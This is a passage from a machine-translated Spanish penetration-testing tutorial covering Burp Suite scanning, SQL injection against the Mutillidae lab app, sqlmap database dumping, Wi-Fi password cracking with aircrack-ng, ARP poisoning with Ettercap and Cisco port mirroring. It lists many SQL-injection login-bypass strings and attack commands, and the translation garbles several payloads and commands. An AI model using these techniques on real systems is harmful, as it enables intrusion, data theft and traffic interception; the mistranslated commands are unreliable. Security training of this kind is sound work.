los dominios, mientras que el escaneo activo está deshabilitado. En la pestaña del escáner Burp,
seleccione "Escaneo en vivo" y asegúrese de que la opción "Usar alcance de la suite" esté seleccionada
en la sección de escaneo activo en vivo.

A continuación, seleccione la pestaña Objetivo, luego la pestaña Mapa del sitio y expanda su objetivo.
A continuación, es hora de comenzar a rastrear la aplicación, así que cambie a la pestaña Araña para
ver el progreso del rastreo.

Una vez que los números dejen de subir, significa que ha terminado el proceso de ejecución. Una vez
que se complete el proceso de rastreo, regrese a la pestaña Mapa del sitio, haga clic derecho en su
objetivo y seleccione el elemento "escanear activamente esta rama".

Burp Suite mostrará una nueva ventana llamada "asistente de escaneo activo". Esta es una herramienta
de configuración fácil para el escáner Burp. El primer paso en esta configuración es este proceso que
le permite eliminar tipos específicos de recursos, incluidas imágenes, JavaScript o estilos de hojas.

En la mayoría de los casos, la configuración predeterminada es adecuada, por lo que todo lo que tiene
que hacer es hacer clic en el botón siguiente. En la siguiente pantalla, la herramienta mostrará una
tabla que contiene la lista completa de puntos finales y parámetros que el escáner Burp incluirá durante
el escaneo.

Es importante revisar cuidadosamente la lista y eliminar los puntos finales que no sean relevantes o
que puedan causar fallas. Una vez que haya finalizado su selección, haga clic en Aceptar para
comenzar a escanear.

Luego, puede monitorear el progreso revisando la "pestaña de cola de escaneo" en el escáner Burp.
Esta tabla proporciona información sobre las solicitudes de escaneo completadas y en curso.

Del mismo modo, proporciona una visión general de los resultados al mostrar el número de
Machine Translated by Google

problemas descubiertos para cada endpoint. De esta tabla también puede eliminar elementos
seleccionando esos recursos, luego haga clic con el botón derecho y seleccione el elemento de eliminación.

Además, puede pausar y reiniciar todo el escáner desde este menú.


Escanear una aplicación web completa puede requerir varios minutos, a veces incluso varias horas.

No obstante, puede analizar los resultados en cualquier momento comprobando los resultados en la
pestaña Resultados del escáner de eructos. Al igual que en la sección Mapa del sitio, esta visualización
agrupa las vulnerabilidades por puntos finales y categorías con una representación conveniente.

Si su escáner Burp encuentra alguna vulnerabilidad de secuencias de comandos en sitios cruzados,


inyección de SQL o recorrido de ruta de archivo, puede hacer clic en un elemento específico en el
aviso para la vulnerabilidad de seguridad seleccionada, y se mostrará a continuación.

Al mostrar el nombre del problema que ha encontrado, también se mostrará información como una
estimación del impacto del sistema afectado, una estimación de la confianza de las herramientas.

Estos pueden ser ciertos, firmes o tentativos, y también mostrará el punto final específico afectado
por la vulnerabilidad de seguridad.

Un menú contextual de la ventana Resultados permite eliminar problemas seleccionando el elemento


"eliminar problemas seleccionados", o asigna un nivel de gravedad diferente al establecer el nivel de
gravedad y cambiar el valor de confianza.

Una vez que se hayan analizado todos los recursos y se haya completado el escaneo, puede exportar
los resultados. Un escáner Burp le permite crear informes HTML o XML básicos que se pueden usar
para realizar un seguimiento de las vulnerabilidades descubiertas.

Además, otras herramientas de seguridad como Metasploit te permitirán importar esos resultados
para realizar otras tareas. En la pestaña Resultados, seleccione todos los elementos que desea
exportar.

Luego seleccione el nodo raíz para exportar todos los hallazgos. Haga clic derecho en el menú
"Seleccionar el contexto" y haga clic en el elemento "Informar problemas seleccionados".

Una nueva ventana titulada "Informes del escáner de eructos" le guiará a través del formato del
informe. Puede utilizar la selección de HTML y hacer clic en Siguiente.

Dentro de esa pantalla, puede personalizar el nivel de detalles que se incluirán en el informe. Por
ejemplo, puede decidir tener el nivel máximo de detalles seleccionando todas las casillas de
verificación y luego haciendo clic en el botón siguiente.
Machine Translated by Google

Como a veces es útil proporcionar instantáneas de las solicitudes y respuestas HTTP afectadas, también
puede decidir incluir extractos relevantes en el informe final.

Seleccione la casilla de verificación adecuada y luego haga clic en Siguiente. En este paso, el asistente
de informes del escáner Burp le permite seleccionar o anular la selección de categorías de problemas
para exportar.

Tome su decisión y seleccione las casillas de verificación apropiadas. Puede seleccionarlos todos y hacer
clic en Siguiente. Finalmente, en el último paso, debe especificar el nombre de archivo del informe.

Haga clic en el botón Seleccionar archivo y explore su sistema de archivos para encontrar una carpeta
donde desee guardar el informe, luego escriba el nombre del archivo, incluida la extensión del archivo, y
haga clic en el botón Guardar. A continuación, asigne un título a su informe.

Además, puede personalizar el diseño del documento cambiando el orden del contenido seleccionando
la organización del problema o la tabla a nivel de contenido. Finalmente, haga clic en el botón Siguiente.

Al final del asistente, una barra de progreso le proporcionará información sobre la generación del informe.
Una vez completado, puede hacer clic en el botón Cerrar.
Machine Translated by Google

Capítulo 14 Fichas de sesiones aleatorias

Los tokens de sesión se utilizan normalmente para realizar un seguimiento de las sesiones, ya
que, de forma predeterminada, HTTP es un protocolo sin estado. En este capítulo, nos
aseguraremos de que los tokens de sesión se aleatoricen correctamente y no se puedan adivinar.

En este ejemplo, puede probar el sitio mutillidae.com, una aplicación web vulnerable, que está
instalada de manera predeterminada en el host metasploitable de Linux.

Puede descargar la máquina virtual metasploitable desde sourceforge.net.


Lo primero que debe hacer es generar algunos tokens de sesión. ¿Sabe cuándo se generan los
tokens de sesión y se los devuelven desde el servidor?

Bueno, el servidor envía un token de sesión cuando su navegador no envía una sesión
equilibrada como solicitud.

Para ensuciar el servidor web por primera vez, debe realizar su solicitud borrando el historial del
navegador y asegurarse de que la opción de cookies esté seleccionada.

Luego, use Burp Suite para interceptar la solicitud. Actualice su página y regrese a Burp Suite
en la pestaña Proxy donde debería ver en su solicitud que el token de sesión no está presente.

A continuación, si hace clic en el botón de reenviar para enviar la solicitud al servidor, obtendrá
una respuesta con una cookie y una nueva ID de sesión.

Haga clic en el botón de reenviar para enviar las solicitudes restantes, y una vez que vea una
pantalla en blanco, sabrá que su trabajo ha terminado.

Haga clic en la pestaña Historial y seleccione un elemento de la lista. Debería ver el encabezado
de su primera solicitud en la sección inferior, así que haga clic en la pestaña Respuesta y haga
clic con el botón derecho dentro de la sección y envíelo al secuenciador.

Una vez que haga clic en "Enviado al secuenciador", salte a la pestaña Secuenciador e
identifique qué tokens de sesión son importantes para usted.

Una vez que elija su token, puede hacer clic en "Iniciar captura en vivo" para comenzar a generar
tokens de sesión. Aparecerá una nueva ventana y comenzará a procesar y generar tokens.

Después de finalizar la captura en vivo, puede comenzar a analizar los tokens de sesión y Burp
Suite le brindará un resumen de la aleatoriedad de sus tokens de sesión.
Machine Translated by Google

Además de esta herramienta, también tienes el análisis de nivel de corrector y el análisis de


nivel de bit.

Hay muchas otras características dentro de la herramienta de secuenciador de Burp, por lo que
recomiendo pasar algún tiempo tratando de entender cómo se generan los tokens de sesión.

Todas las principales aplicaciones web utilizan diferentes tipos de implementaciones y algoritmos
para generar tokens de sesión.
Machine Translated by Google

Capítulo 15 Burp Spider-ing e inyección SQL

Cuando realiza una prueba de pluma de una aplicación web, lo primero que puede hacer es
rastrear el host mediante Burp Suite. Significa que Burp rastreará todo el sitio web y registrará
todos los diferentes archivos y métodos HTTP en ese sitio. ¿Por qué arañas al anfitrión?

Bueno, esto se debe a que necesita identificar dónde están todos los enlaces, qué tipos de
parámetros se usan en la aplicación, a qué sitios externos también hace referencia la aplicación
y el diseño general de cómo funciona la aplicación.

Para rastrear su aplicación, debe asegurarse de que la pestaña de destino esté seleccionada y
luego la pestaña del mapa del sitio también esté seleccionada. A continuación, haga clic con el
botón derecho en el dominio que agregó a su alcance anteriormente y luego haga clic en el
elemento llamado "arañar esta rama".

Una vez que se completa el proceso de rastreo, Burp debería tener un buen diseño de cómo se
ve exactamente la aplicación. También puede hacer clic en cualquier archivo de la lista que
proporciona Burp para ver cuál fue la solicitud y la respuesta.

Asimismo, en la columna de la izquierda, bajo la carpeta “mutillidae”, se puede ver la estructura


del sitio web. En la parte superior derecha, debajo de la pestaña del mapa del sitio, se encuentra
el botón de filtro con el que puede intentar jugar para ver qué está filtrando y qué funciona para
usted.

En general, se prefiere agregar primero todos sus dominios al alcance y luego hacer clic en el
filtro para mostrar solo aquellos que están en el alcance.

A veces, las páginas o carpetas no están vinculadas directamente desde una aplicación web.
Por ejemplo, a menudo se ve que la carpeta de administración o las páginas de inicio de sesión no se
mencionan en ninguna parte del sitio web.

Esto se debe a que los administradores del host intentan ocultar estas carpetas y páginas
administrativas de inicio de sesión a los usuarios generales. Este tipo de cosas que está
buscando en su prueba de penetración, para que pueda intentar eludir o fuerza bruta el proceso
de autorización.

Hay un módulo específico dentro de Burp que es extremadamente útil en estos escenarios
llamado "descubrir contenido".

Si abre el navegador e ingresa la dirección IP de la máquina virtual metasploitable, Burp Suite


debería estar interceptando sus solicitudes, por lo tanto,
Machine Translated by Google

debería detenerlo.

A continuación, haga clic en el hipervínculo "mutillidae". Mutillidae es una aplicación de piratería web
vulnerable compuesta por scripts PHP que son vulnerables a las 10 principales vulnerabilidades de
OWASP.

Puede iniciar un nuevo ataque en el sitio simplemente visitando la página web de mutillidae.com.
Burp Suite ya debería reconocer su existencia.

A continuación, vuelva a Burp Suite y haga clic en la pestaña "Objetivo", seleccione su dominio, haga
clic derecho sobre él y agréguelo al alcance.

Después de esto, debe rastrear la aplicación, pero antes de hacerlo, hay algo que debe tener en
cuenta.

Debido a que el sitio web mutillidae.com tiene muchos formularios cuando rastrea la aplicación, Burp
Suite abrirá un cuadro de diálogo pidiéndole que ingrese las credenciales manualmente para cambiar
este comportamiento predeterminado, por lo que debe hacer clic en la "pestaña Spider" y luego
seleccionar " Pestaña de opciones”.

Debería ver que, de forma predeterminada, se selecciona la solicitud de orientación. Cámbielo a la


última opción porque puede usar una "cadena de inyección de SQL inteligente" en su lugar. En el
campo de nombre de usuario, escriba "admin", seguido de espacio, 1 = 1, espacio, guión y deje el
campo de contraseña en blanco.

Nota: Algunas personas prefieren usar otros usuarios administradores para eludir la autenticación por
inyección de SQL.

El hecho es que hay varias formas de omitir la autenticación, por lo tanto, enumeraré a continuación
todas las variaciones de contraseñas de administrador que encontré antes;

“administrador' --“

“admin' #“
“admin'/*“
“admin' o '1'='1“
“admin' o '1'='1'--“
“admin' o '1'='1'#“
“admin' o '1'='1'/*“
“admin'o 1=1 o ''='“
“admin' o 1=1“
“admin' o 1=1--“
“admin' o 1=1#“
“admin' o 1=1/*“
“admin') o ('1'='1“
Machine Translated by Google

“admin') o ('1'='1'--“
“admin') o ('1'='1'#“
“admin') o ('1'='1'/*“
“admin' ) o '1'='1“
“admin') o '1'='1'--“
“admin') o '1'='1'#“
“admin') o '1'='1' /*“
“administrador" --“
“administrador" #“
“administrador"/*“
“admin" o "1"="1“
“admin" o "1"="1"--“
“admin" o "1"="1"#“
“admin" o "1"="1"/ *“
“admin" o 1=1 o ""="“
“admin" o 1=1“ “admin" o
1=1--“ “admin" o 1=1#“

“admin" o 1=1/*“
“admin”) o ("1"="1“
“admin") o ("1"="1"--“
“admin") o ("1"=" 1"#“
“admin”) o ("1"="1"/*“
“admin") o "1"="1“ “admin")
o "1"="1"--“ “admin" ) o
"1"="1"#“ “administrador”)
o "1"="1"/*“

Continuando, debe volver a la pestaña Destino y comenzar a rastrear la aplicación. Después


de eso, cambie a la pestaña Araña para ver el progreso de la araña.

Cuando vea que los números dejan de subir, significa que ha terminado el proceso de
ejecución. Una vez que se complete el proceso de rastreo, regrese a la pestaña "Mapa del
sitio", haga clic derecho en la carpeta Mutillidae del menú desplegable, seleccione
"Herramientas de participación" y luego haga clic en "Descubrir contenido".

Una vez dentro de su módulo de descubrimiento, puede hacer clic en el botón "La sesión
no se está ejecutando" y la aplicación iniciará la fuerza bruta inteligente.

En este momento, el ataque de fuerza bruta está aprendiendo de los archivos y carpetas
que encuentra dentro de la aplicación e intenta tomar mejores decisiones para la fuerza bruta.

Esta técnica proporciona un proceso eficiente para identificar carpetas y archivos de prueba
de su aplicación. Puede hacer clic en la pestaña "Mapa del sitio" en la parte superior de la
Machine Translated by Google

módulo de descubrimiento y vea todos los resultados del análisis de fuerza bruta.

Esto ayudará a identificar rápidamente carpetas ocultas, páginas de administración, páginas de


configuración y otras páginas interesantes que serán extremadamente útiles para cualquier pen
tester.
Machine Translated by Google

Capítulo 16 Inyección SQL con SQLmap

La vulnerabilidad más común y explotable en los sitios web es la vulnerabilidad de inyección que
ocurre cuando el sitio web de la víctima no monitorea las entradas.

Por lo tanto, permitir que el atacante interactúe con la base de datos de back-end. Una de las
herramientas más útiles para evaluar las vulnerabilidades de inyección SQL se llama SQLmap.

Es una herramienta de Python que automatiza el reconocimiento y la explotación de múltiples tipos


de bases de datos. En este capítulo, aprenderá sobre el ataque de inyección SQL contra el sitio
web mustillidae.com.

Si está utilizando metasploitable, existe la posibilidad de que necesite arreglarlo para el sitio web
mutillidae.com. Primero, debe conectarse a su host metasploitable mediante SSH.

Utilice el nombre de usuario de "mfsadmin" y la contraseña predeterminada que también es


"mfsadmin". Una vez que esté conectado a la máquina metasploitable, debe abrir el archivo de
configuración del sitio web mutillidae.com.

En este archivo, debe asegurarse de que la cadena de conexión apunte a la base de datos
OWASP 10. Una vez completado, puede comenzar su tarea de inyección de SQL.

Primero, abra el sitio web mutillidae.com. A continuación, en el menú de la izquierda, seleccione


el elemento OWASP 10, luego el elemento del menú Inyección y elija la primera página de prueba
de inyección SQL desde la parte superior.

Esta página es vulnerable a la inyección SQL, por lo que debe interceptar la solicitud que envió al
servidor utilizando Burp Suite. Antes de hacer clic en "Ver detalles de cuentas", debe asegurarse
de que Burp Suite esté activo.

Al volver a Burp Suite, debería ver el contenido de su solicitud.


A continuación, debe guardar el contenido en un archivo y, después de eso, ya no necesita Burp
Suite.

Puede cerrar todo y abrir su consola. A continuación, escriba "sqlmap -dbs"

y presione Intro para determinar las bases de datos disponibles. La base de

datos más probable para almacenar los datos de las aplicaciones es la base de datos OWASP 10,
por lo tanto, deberá verificar las tablas de esa base de datos, utilizando el comando:
Machine Translated by Google

“sqlmap --tables --database owasp –u” y

presiona enter. Los datos de retorno de la ejecución de este comando deberían mostrarle
las tablas disponibles dentro de la base de datos OWASP.

Luego, verifique la tabla de cuentas y descargue los datos de esta tabla. Puede enumerar
las tablas en la base de datos con el siguiente comando: "sqlmap -u "URL" --tables -d

nombre_de_la_base de_datos"
Puede enumerar los nombres de las columnas en una tabla con otro comando:

“sqlmap -u "URL" --columns -d nombre_base_datos -T nombre_tabla”

Puede volcar los datos usando el comando:

“sqlmap -u "URL" --dump -d nombre_base_datos -T nombre_tabla”


Machine Translated by Google

Capítulo 17 Ataque de diccionario con Airodump-ng

Para ejecutar un ataque de diccionario en una red inalámbrica donde la red inalámbrica
está protegida con WPA o WPA2, seguiremos un proceso de cuatro pasos.

Primero, queremos averiguar el BSSID del punto de acceso contra el que queremos
ejecutar nuestro ataque de diccionario. Una vez que hayamos encontrado el punto de
acceso que queremos atacar, debemos decidir la lista de palabras que queremos usar
para el ataque.

Una lista de palabras, como sugiere el nombre, es una lista de palabras, como un
diccionario, y vamos a probar esa lista de palabras con el punto de acceso.

El tercer paso es que vamos a generar tráfico de autenticación. Para que este ataque
funcione, necesitamos poder capturar a un usuario legítimo que se conecta al punto de
acceso y vamos a generar ese tráfico, para que podamos rastrearlo por aire. Por último,
tenemos que ejecutar el ataque de diccionario.

Para este ataque, usaremos Kali Linux. Para hacer eso, debe abrir una terminal y mirar
la configuración. Escriba "iwconfig" y debería ver dos de sus adaptadores inalámbricos

de LAN inalámbrica. Wireless wlan1 debe ser la tarjeta LAN inalámbrica de su dispositivo

que está integrada en su dispositivo, y wireless wlan0 es su adaptador LAN virtualizado


Kali Linux si ha conectado correctamente sus dispositivos.

Este es también el que usará para ejecutar su ataque. Por lo tanto, lo primero que debe
hacer es poner la tarjeta WLAN de Kali Linux en modo monitor, pero antes de hacerlo,
debe desconectar su adaptador LAN inalámbrico escribiendo: "ifconfig wlan0 down"

Siguiente tipo:

“monitor de modo iwconfig wlan0”

Este comando pondrá su adaptador de LAN inalámbrica en modo monitor. Pero para
asegurarse de que la wlan esté respaldada, debe escribir el comando: "ifconfig wlan0 up"
Machine Translated by Google

Ahora que su adaptador de LAN inalámbrica está respaldado, desea confirmar que ahora está
en modo de monitor. Para hacer eso, tienes que escribir el comando:

"iwconfig"

Aquí, debería ver donde dice "Modo", junto a eso, debería decir que la tarjeta ahora está en
modo monitor. Su próximo paso es encontrar el BSSID del punto de acceso que desea atacar.
Para eso vas a usar la herramienta llamada Aircrack, entonces tienes tipo: “airodump-ng wlan0”

Esto comenzará a buscar BSSID-s transmitidos. Aquí, verá que está capturando los BSSID de
los puntos de acceso circundantes y los canales que están utilizando.

NOTA: No comprometa la conexión inalámbrica de sus vecinos o, lo que es peor, no utilice esta
herramienta en un entorno de producción, a menos que tenga una autorización por escrito.

Volviendo a Kali Linux, para salir del monitoreo, puede presionar “Ctrl+C” para detener la
búsqueda una vez que haya encontrado su BSSID inalámbrico que va a atacar.

Dentro de la salida de Kali, también debe tener la dirección MAC del BSSID, que normalmente
es una letra de 12 caracteres y números de los que debe tomar nota, porque necesitará esa
dirección MAC cuando ejecute el ataque. .

El siguiente paso es encontrar una lista de palabras que pueda usar para ingresar al punto de
acceso, y Kali tiene varias herramientas que puede usar para este propósito.

También puede descargar otras herramientas similares, pero la herramienta llamada "Airodump"
simplemente hará el trabajo. Por lo tanto, debe escribir:

“airodump-ng –bssid 00:11:22:33:44:55:66 –canal 1 –escribir wepcracking wlan0”

NOTA: Esto es solo un ejemplo, pero donde dije "00:11:22:33:44:55:66", debe escribir la
dirección mac real del BSSID que está a punto de comprometer, así como el el canal para usted
podría ser el canal 6 o el canal 11.

Una vez que haya ejecutado con éxito el comando anterior, verá que se ha iniciado el monitoreo
de la red wlan0.
Machine Translated by Google

Aquí, verá la transferencia de datos en la columna "datos". Tenga en cuenta que todo
depende de la complejidad de la contraseña, ya que puede tardar unos minutos.

Después de haber esperado unos minutos, debería tener suficientes datos con los que
pueda trabajar, por lo tanto, debe abrir una nueva terminal y escribir:
"Ls"

Esto mostrará una lista de los archivos que ha capturado hasta ahora. Ahora para
descifrar la contraseña, debe escribir el siguiente comando: "aircrack-ng

wepcracking-01.cap"
Aquí, el nombre de archivo "wepcracking-01.cap" es un ejemplo, pero debe escribir allí
el nombre de archivo que haya recopilado y llamado con el comando "ls", junto al
nombre de archivo "Público".

Si ha estado utilizando la autenticación WEP, ahora la contraseña estará descifrada.


Aircrack-ng normalmente enumera la contraseña como un archivo ASCII diciendo
"LLAVE ENCONTRADA".

Por último, le pediré nuevamente que se asegure de tener una autorización por escrito
para usar Airodump-ng en un entorno de producción o en vivo. Si solo está practicando
en el laboratorio de su casa, en un entorno que no sea de producción, eso no debería
causar ningún problema a nadie; aún así, te sugiero que apagues tu enrutador y
practiques con cuidado sin ninguna conexión a Internet.
Machine Translated by Google

Capítulo 18 Envenenamiento por ARP con EtterCAP

Imagine que se le ha asignado llevar a cabo un ataque MITM (Man in the Middle) contra
un host o servidor específico, y la elección de las herramientas a utilizar depende de usted.

,
Hay varias formas de llevar a cabo un ataque MITM y en este capítulo vamos a utilizar
otra excelente herramienta que podría considerar llamada EtterCAP.

EtterCAP es otra excelente manera de realizar un ataque MITM, ya que tiene una interfaz
gráfica de usuario o GUI fácil de usar que proporciona el llamado método de clic, selección
y listo.

Siempre es mejor tener más conocimiento sobre herramientas adicionales si no


funcionaran o no tuvieran acceso en el momento en que se le asignó la prueba de
penetración.
Debe tener en cuenta que para lograr el mismo resultado, hay otras opciones que puede
elegir. EtterCAP es otra herramienta integrada en la plataforma Kali Linux. Para iniciar
EtterCAP, puede emitir un comando: “ettercap –G”

Luego presiona enter. Una vez que se inicia EtterCAP, esperará a que le proporcionemos
más instrucciones, y primero debe hacer clic en una opción del menú: Sniff > luego
seleccione "unified sniffing".

A continuación, debe especificar la interfaz de red que utilizará para rastrear.


En mi caso es ethernet0.

Esto creará algunas opciones de menú adicionales, por lo que ahora debe hacer clic en
la opción de menú: "Host", luego haga clic en "Buscar hosts".

Esto no debería tomar más de 5 segundos para descubrir todos los hosts que están en la
misma red. Una vez completado, regrese al icono del menú; Host > luego haga clic en las
listas de hosts para ver todas las direcciones IP de los hosts y las direcciones MAC
asociadas a ellos.

Una vez que tenga una lista de hosts, puede resaltar la dirección de origen y hacer clic en
"Agregar al destino 1", luego resalte la dirección de destino y haga clic en "Agregar al
destino 2".
Machine Translated by Google

El método que utilizamos se llama ENVENENAMIENTO ARP.

ARP significa Protocolo de resolución de direcciones. Los enrutadores, los conmutadores de


capa 3 tienen entradas ARP o tablas ARP que contienen todas las direcciones IP y sus
direcciones Mac o direcciones físicas asociadas que están conectadas a la red.

Sin embargo, si usamos ARP Poisoning, podríamos falsificar la dirección de origen real
diciéndole al destino que tenemos la dirección IP y la dirección Mac del nodo de origen, por lo
que todo el tráfico que está planeado para llegar al host de origen real, de ahora en adelante ,
vendría primero a nosotros.

Además, todo el tráfico que está planeado para llegar al host de destino también nos llegará
a nosotros, ya que también envenenamos la fuente real y le decimos que la dirección IP de
destino y la dirección Mac ahora son nuestra máquina.

El uso de ARP Poisoning es uno de los mejores métodos para crear un ataque Man in the
Middle, ya que ahora todo el tráfico que va y viene entre el origen y el destino en realidad
pasa por nosotros.

Teniendo todo ese tráfico capturado, podemos decidir si solo queremos analizarlo, capturarlo,
modificarlo, reenviarlo a un destino diferente o simplemente detener la comunicación entre
esos dispositivos.

Por lo tanto, la pieza final para lanzar un ataque de este tipo es hacer clic en el ícono de menú
llamado "MITM" y luego seleccionar "Envenenamiento ARP". Una vez que haya terminado y
desee detener el envenenamiento ARP, haga clic en "Detener ataque(s) MITM".

Por último, le pediré nuevamente que se asegure de tener una autorización por escrito para
usar este método en un entorno en vivo o de producción, ya que cualquier tipo de ataque Man
in the Middle es muy peligroso, especialmente cuando manipula el tráfico enrutado mediante
el envenenamiento de las tablas ARP. alimentando direcciones Mac falsas.

Si solo está practicando en el laboratorio de su casa, en un entorno que no sea de producción,


eso no debería causar ningún problema a nadie; aún así, te sugiero que apagues tu enrutador
y practiques con cuidado sin ninguna conexión a Internet.
Machine Translated by Google

Capítulo 19 Captura de tráfico con Port Mirroring

Que todas las computadoras conectadas a la red procesen el paquete de transmisión ARP sería
una pérdida de recursos. En cambio, las tarjetas de interfaz de red de los dispositivos en la red
para los que no está destinado el paquete, reconocen que el paquete no es para ellos, por lo
que el paquete se descarta, en lugar de pasar a la CPU para su procesamiento.

Al usar el modo promiscuo, puede asegurarse de capturar todo el tráfico.


Cuando opera en modo promiscuo, la tarjeta de interfaz de red pasa cada paquete que ve al
procesador principal, independientemente del direccionamiento.

Una vez que el paquete llega a la CPU, la herramienta llamada Wireshark puede capturarlo para
su análisis. Hay tres formas principales de capturar el tráfico de un dispositivo de destino en una
red conmutada.

El primero es el envenenamiento ARP, o ataque Man-In-The-Middle, que acabo de compartir


con ustedes en el capítulo anterior usando ambos en conjunto.

El segundo método para capturar el tráfico de un dispositivo de destino en una red conmutada
es mediante un toque. También conocido como "toma de red", que es un dispositivo de hardware
que puede colocar entre dos puntos finales en su sistema de cableado para capturar el tráfico
entre ellos.

El tercer método es Port Mirroring. La duplicación de puertos o expansión de puertos es quizás


la forma más fácil de capturar el tráfico de un dispositivo de destino en una red conmutada.

En este tipo de configuración, debe tener acceso a la línea de comandos o a la interfaz de


administración web del conmutador en el que se encuentra la computadora de destino.

Del mismo modo, el conmutador de red debe admitir la duplicación y tener un puerto no utilizado
en el que pueda conectar su rastreador. Puede configurar Port Mirroring en la mayoría de los
conmutadores de Cisco una vez que se haya conectado, ya sea mediante "SSH" o un cable de
consola.

Para habilitar la duplicación de puertos, emite un comando que obliga al conmutador a copiar
todo el tráfico de un puerto a otro puerto. Pero primero, debe enumerar los puertos en un
conmutador emitiendo el comando "show ip interface brief"

Si no está familiarizado con los comandos de conmutación de Cisco, no se preocupe demasiado


Machine Translated by Google

ya que solo vamos a ver un ejemplo simple. Una vez que haya enumerado los puertos Ethernet
disponibles, digamos que desea instalar su sniffer en el puerto 2 y reenviar todo el tráfico del puerto 1
al puerto 2.

Para comenzar los comandos de configuración, primero emite el comando "configurar

terminal" de solo

"conf t"

Luego presiona enter. A continuación, debe especificar el puerto de origen, que es el puerto 1 para
nuestro ejemplo, por lo que inicia su comando escribiendo "monitor", seguido de un número de sesión
aleatorio.

El número de sesión puede ser cualquier número de su elección y luego especifica que es una fuente;
y finalmente ingresas el número de puerto.

Luego escribe el número de puerto de destino, y aquí es donde se encuentra su rastreador. Mismo
comando con el mismo número de sesión, pero esta vez es un destino y el número de puerto es 2.

Los comandos que desea escribir son los siguientes:

"conf t"

“supervisar la interfaz de origen de la sesión 1 GigabitEthernet1/0/1”

“supervisar la interfaz de destino de la sesión 1 GigabitEthernet 1/0/2”

"Salida"

"Salida"

"escribir memoria"

Para verificar su sesión de monitoreo, puede escribir el comando "mostrar sesión" seguido del número
de sesión, en este caso 1 de la siguiente manera;

"Mostrar sesión 1"

El resultado le mostrará que el puerto de origen es GigabitEthernet número 1 y el puerto de destino es


GigabitEthernet número 2. Después de estos pasos, todo el tráfico se reenviará del puerto 1 al puerto
2.
Machine Translated by Google

Capítulo 20 Reconocimiento Pasivo con Kali

Cualquiera puede escuchar las señales inalámbricas que se transmiten por el aire.
Cuando escucha señales inalámbricas, puede sintonizar su radio para escuchar tráfico
específico que va hacia y desde un cliente, o hacia y desde un punto de acceso o puede
simplemente escuchar todo y luego filtrar lo que desea escuchar en un tiempo posterior

Al igual que si se lleva la mano a la oreja para escuchar mejor o tal vez un vaso a la
pared para escuchar la conversación al otro lado de la pared, con la conexión
inalámbrica, puede usar una antena direccional para captar más señal. fuerza desde
una dirección determinada.

Lo que eso significa es que puedo estar a cierta distancia del punto de acceso o de su
cliente, y aun así poder capturar el tráfico por aire. Lo que eso significa es que no sabes
que estoy espiando tu tráfico.

Pero, ¿cómo puedo escuchar y capturar tráfico? Bueno, escucho sintonizando mi radio
en el canal de frecuencia, recopilando todas las señales, procesando esas señales en
mi pila de protocolos y luego mostrándolas con una herramienta de análisis de paquetes
como Wireshark.

Escuchar por aire es una de las mejores formas de realizar un reconocimiento pasivo.
El reconocimiento pasivo es cuando recopila información sobre una red, una corporación
o un individuo, pero no se involucra activamente con el sistema, la red o el individuo.

Es posible que esté recopilando información como, por ejemplo, ¿cuál es el fabricante
de sus puntos de acceso? ¿Cuáles son las direcciones MAC que utilizan los clientes?
¿Qué mecanismos de seguridad utiliza una empresa en particular? ¿Cuáles son los
nombres de las redes? ¿Tienen acceso de conjetura configurado en estos puntos de acceso?
¿Tienen nombres de red ocultos?

Al recopilar información, a medida que comienza a formarse una imagen de la


implementación, puede pasar a la segunda fase cuando comienza a planificar cómo
atacará la red.

A través de la fase de reconocimiento pasivo, estaría escribiendo y formando un mapa


de red donde se implementan los puntos de acceso, escribiendo sus nombres y creando
un plan de implementación e identificando cualquier debilidad que pueda tener la red.
Si un hacker va a intentar y
Machine Translated by Google

acceder a una red empresarial, la tecnología inalámbrica tiene que ser uno de los tres
enfoques principales para descubrir información con el fin de planificar ese ataque.

Para capturar y mostrar el tráfico que pasa por el aire, necesita una herramienta llamada
Wireshark. Puede descargar Wireshark desde su sitio web mencionado anteriormente, o
puede usar la herramienta que ya está disponible en Kali Linux.

Para hacerlo dentro de Kali Linux, vamos a seguir un proceso de cuatro pasos. Lo primero
que vamos a hacer es poner nuestro adaptador inalámbrico en modo monitor.
Eso permitirá que nuestro adaptador detecte todo en el aire, capture todo y lo pase a la
aplicación Wireshark para que se muestre y luego podamos analizar esos paquetes.

Podemos seleccionar todo por aire o podemos buscar tráfico de un BSSID específico o en
un canal específico. Una vez que hayamos seleccionado el BSSID y/o el canal, podemos
abrir Wireshark, seleccionar la interfaz de monitoreo que hemos configurado para nuestro
adaptador inalámbrico y comenzar a capturar datos.
Una vez que hayamos capturado suficientes datos, podemos guardar esa captura de paquetes para
luego analizarlos en otro momento.

Lo primero que queremos hacer es poner nuestro adaptador en modo monitor. En el


capítulo anterior ya discutimos cómo hacerlo, pero puede verificar para asegurarse de que
su interfaz inalámbrica todavía esté en modo de monitoreo escribiendo:

"iwconfig"

Esto le permitirá ver en qué modo se encuentra su interfaz inalámbrica, pero si no ha


realizado ningún otro cambio de los que hemos discutido hasta ahora, su WLAN aún
debería estar en modo de monitoreo.

Hay varias formas de habilitar el modo de monitor, como usar "iwconfig", pero

ese método no funciona para todos los adaptadores. Este método no funciona

para todos los adaptadores, por lo que si intentó habilitar en modo monitor usando el
comando anterior y no funcionó, o si funcionó pero el adaptador no se comportó como se
esperaba al usarlo, entonces una buena idea es intentar habilitar modo de monitor usando
un método diferente.

Por ejemplo, si su adaptador inalámbrico está en "Modo administrado" y no sabe cómo


ponerlo en "Modo de monitoreo", la solución es fácil.

Lo primero que puede hacer es deshabilitar la interfaz escribiendo


Machine Translated by Google

"ifconfig lan0 inactivo"

Ahora puede continuar y habilitar el modo de monitor, pero antes de hacerlo, es bueno
eliminar cualquier proceso que pueda interferir con el uso del adaptador en modo de
monitor. Para hacer eso tenemos que usar una herramienta llamada “airmon-ng” Escriba:

“airmon-ng check kill”

Aquí le diremos a Kali que queremos que verifique todos los procesos que pueden interferir
con el modo de monitor, y si encuentra algo, queremos que lo elimine. Comando muy
simple.

Airmon-ng está en el nombre del programa. “Comprobar” significa comprobar cualquier


proceso que pueda interferir en el modo de supervisión. “Matar” significa matar los procesos
si los hay.

Si presiona enter, verá que eliminará algunos procesos y notará que el ícono del
administrador de red desaparece. Esto se debe a que este comando lo mata y perderá su
conexión a Internet si estaba conectado, pero está bien porque perderá su conexión a
Internet de todos modos si habilita el modo de monitor.

Al hacer esto, hace que el adaptador funcione mejor en modo monitor. Ahora está listo
para habilitar el modo de monitor, y en lugar de usar el comando "iwconfig"

Puedes usar:

“Airmon-ng iniciar wlan0”

Una vez más, airmon-ng es el nombre del programa que estamos usando para habilitar el
modo de monitor. “Iniciar” significa que queremos iniciar el modo monitor, en una interfaz
llamada “wlan0”

